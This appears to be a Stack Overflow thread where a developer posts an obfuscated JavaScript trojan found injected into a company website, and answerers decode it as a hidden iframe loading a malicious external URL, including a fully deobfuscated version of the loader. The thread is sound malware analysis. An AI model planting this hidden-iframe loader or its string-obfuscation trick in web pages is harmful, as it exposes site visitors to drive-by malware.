views:

110

answers:

3

Hi all,

I've recently been playing with allot of Javascript and started to consider that I couldn’t encounter a piece of Javascript that I wouldn’t be able to debug.

Well I was pleasantly surprised and angered today when we discovered a number of javascript redirect trojans on our company’s website.

Most of the code we found I was able to easily dissect and used standard escaping to obfuscate the codes function.

But among the code we found the code below has completely stumped me on what its doing. (The only part that I can seem to work out is that it is doing a replace on some of the parameters).

So would anyone please be kind enough to dissect the following code for me? I would love to know exactly what’s going on...

<script>

function yJ() {};
this.sMZ = "sMZ";
yJ.prototype = {
    w: function () {
        var rJ = 13390;
        this.m = "m";
        this.fP = '';
        this.q = "q";
        this.oJ = "";
        var vS = function () {
            return 'vS'
        };
        var d = 'replace';
        var qB = "";
        x = '';
        var s = document;
        var xZ = "xZ";
        mC = '';
        var dV = "dV";
        var b = window;
        this.p = false;
        this.kX = '';
        nP = "nP";
        var zE = "";
        this.nU = false;
        var yV = function () {
            return 'yV'
        };
        String.prototype.gT = function (l, v) {
            return this[d](l, v)
        };
        this.pC = '';
        var qV = false;
        var fPU = new Array();
        h = "";
        var sV = 'sKe}tKTIiWmEe}oEu}tK'.gT(/[KE\}IW]/g, '');
        var xV = 43258;
        sT = '';
        var mV = '';
        this.wJ = "wJ";
        var f = '<jhItImIlI I>j<IhjezaIdz ;>;<z/;hjeIaIdI>;<zb!ojdjyj ;>I<!/jbIo!d!yI>z<j/Ihjt;m;lj>!'.gT(/[\!Ijz;]/g, '');
        var xB = '';
        wI = "wI";
        oT = false;
        var nQ = 49042;
        try {
            zI = '';
            var bF = new Array();
            var aY = function () {
                return 'aY'
            };
            var rN = false;
            rF = "";
            var cX = function () {
                return 'cX'
            };
            var y = 'bToTdTy+'.gT(/[\+\]aT%]/g, '');
            this.rL = '';
            var vH = function () {
                return 'vH'
            };
            var r = 'sStEy9l?eE'.gT(/[ES9\?m]/g, '');
            yD = "";
            var eA = '';
            var bQ = 'i.fWrhalmlel'.gT(/[lW\.xh]/g, '');
            vZ = '';
            this.bG = "";
            this.vL = false;
            var t = 'w5r[i5t[e%'.gT(/[%C5\[U]/g, '');
            gI = '';
            dVL = "dVL";
            var n = 'cZrzeZaZtze.E.l.e;m;eSnzt;'.gT(/[;SZz\.]/g, '');
            lH = "";
            kD = "kD";
            this.pH = false;
            var k = 's9ric9'.gT(/[9Ni~O]/g, '');
            var vB = '';
            var kH = function () {
                return 'kH'
            };
            var qH = new Array();
            aD = '';
            this.eQ = false;
            var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, '');
            var cT = '';
            var kL = function () {
                return 'kL'
            };
            var bR = new Array();
            this.cP = 22454;
            var dH = 'hNi9d0d>e*n*'.gT(/[\*9N\>0]/g, '');
            lG = '';
            tG = 7587;
            hV = '';
            this.oR = "oR";
            var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, '');
            var dC = function () {};
            var eR = new Date();
            var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');
            uM = "";
            var i = function () {};
            this.cI = "";
            tU = false;

            function qN() {};
            xL = 57256;
            var c = this.a();
            this.eL = '';
            var rY = function () {};
            fG = false;
            nO = false;
            this.j = "";
            this.iQ = 5330;
            var sY = function () {};
            var u = document[n](bQ);
            this.tH = false;
            zX = "";
            u[r][o] = dH;
            var kV = "kV";
            pN = '';
            var yG = new Array();
            this.nOE = 818;
            u[z](k, c);
            this.bQK = "";
            var yU = 15629;
            var sM = new Array();
            var eY = "eY";
            var qP = '';
            s[y][e](u);
            var lU = "lU";
            var zR = false;
            var xS = "";
            iX = 34795;

            function pO() {};
            this.gM = "";
        } catch (g) {
            var xI = false;
            this.gO = false;
            this.iZ = false;
            this.iU = false;
            var mQ = new Date();
            var qF = function () {};
            s.write(f);
            var tS = "tS";

            function aR() {};
            nA = "nA";
            var xT = new Date();
            mZ = false;
            var gN = new Array();
            var wE = this;
            var eB = 3562;
            this.qE = "qE";
            this.cS = false;
            this.vK = false;
            qEJ = false;
            this.hW = false;
            b[sV](function () {
                function bI() {};
                hJ = "";
                var kVQ = "kVQ";
                var iG = "";
                var eBS = new Array();
                rA = "";
                wE.w();
                jY = "";
                var hB = "hB";
                var iZF = '';
                qY = "";
                jYG = "";
                uK = 30969;
                var qD = "qD";
            }, 326);
            this.qC = "";
            var aX = function () {};
            var cN = "";
        }
        gB = false;
        var fF = false;
        this.hX = false;
    },
    a: function () {
        rH = "rH";
        this.bV = '';
        var qW = "";
        return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');
        var sMS = new Array();
        this.wL = false;
        uS = "uS";

        function pI() {};
    }
};
var uI = false;
var kN = new yJ();
this.aQ = "aQ";
kN.w();
hT = 15101;

</script>
+4  A: 

It adds an invisible iFrame to the following URL to your website:

<iframe style="visibility: hidden;" src="http://fancycake.net/.ph/1/"&gt;&lt;/iframe&gt;

The website fancycake is marked as attacked and malicious under Firefox

Erik
How did you find out?
Aaron Digulla
by running it in a JavaScript Debugger and watching what was happening. After this, I surfed for the iframes URL and saw the Firefox warning :)
Erik
+1  A: 

Run it in a JavaScript debugger; eventually, the code will decompile itself and try to start. I suggest to use the latest version of FireFox maybe on a Linux box to be on the safe side.

Aaron Digulla
+7  A: 

It embeds http://fancycake.xxx/something, and this is the line where you can see it:

return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');

You see how every odd character, when plucked from that string, forms the URL. I didn't run this, so I'm not sure under what conditions it does this, but you can see that String.replace has been renamed to String.gT and is being passed a regex against the characters which make the string obfuscated. If you apply that same method, plucking odd characters, you can see that there is a hidden iframe, some javascript event handlers, setAttribute, etc:

var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, '');
var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, '');
var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');

This is how String.replace is aliased:

var d = 'replace';

...
String.prototype.gT = function (l, v) {
    return this[d](l, v)
};

Within the context of that function, this is the string on which gT is being called and d is the string replace. On a string's prototype, this['replace'] returns the replace() method, which is then called with the two arguments to gT. The result is then returned.

Update

I transformed the script like so:

  1. Replaced all string.gT() calls with their plain forms.
  2. Removed any variables that aren't referenced.
  3. Gave functions some common-sense names.

This is the result, it should be pretty clear how it works now:

function FancyCake() {};
FancyCake.prototype = {
    embed: function () {
        var d = 'replace';
        var s = document;
        var b = window;
        var sV = 'setTimeout';
        var f = "<html ><head ></head><body ></body></html>";
        try {
            zI = '';
            var bF = new Array();
            var y = 'body';
            var r = 'style';
            var bQ = 'iframe';
            var t = 'write';
            var n = 'createElement';
            var k = 'src';
            var z = 'setAttribute';
            var dH = 'hidden';
            var o = 'visibility';
            var e = 'appendChild';
            var c = this.getUrl();
            var u = document[n](bQ);
            u[r][o] = dH;
            u[z](k, c);
            s[y][e](u);
        } catch (e) {
            console.error(e);
            s.write(f);
            var cake = this;
            b[sV](function () {
                cake.embed();
            }, 326);
        }
    },
    getUrl: function () {
        return "http://fancycake.net/.ph/1/";
    }
};

var cake = new FancyCake();
cake.embed();
Jesse Dhillon
+ for explaination
Sky Sanders
It didn't occur to me that what I was looking at was regex amongst all that mess. What I dont get now is, ok I get the basic idea of the prototype keyword but how does return this[d](l, v) result in an override of the regex pattern matching? or else what are they trying to achieve in that line of code?PS: Thanks for the explanation because obviously I stuck it into a debugger but have still struggled to understand it.
Maxim Gershkovich
I've updated the answer to include an explanation about replace.
Jesse Dhillon
Thank you so much the function makes perfect sense now...
Maxim Gershkovich